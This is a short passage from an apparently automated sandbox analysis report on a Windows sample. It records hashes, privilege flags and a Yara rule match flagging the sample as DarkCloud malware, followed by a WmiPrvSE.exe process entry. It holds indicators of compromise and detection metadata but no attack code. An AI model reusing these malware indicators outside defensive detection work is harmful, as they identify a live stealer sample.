                                                                                      File size:459'776 bytes
                                                                                      MD5 hash:8F6EE9BA8FF5FD89141322D36E8FE46D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000001.00000000.2349408415.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      Target ID:2
                                                                                      Start time:07:39:32
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                                                                      Imagebase:0x430000
                                                                                      File size:418'304 bytes
                                                                                      MD5 hash:64ACA4F48771A5BA50CD50F2410632AD
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      No disassembly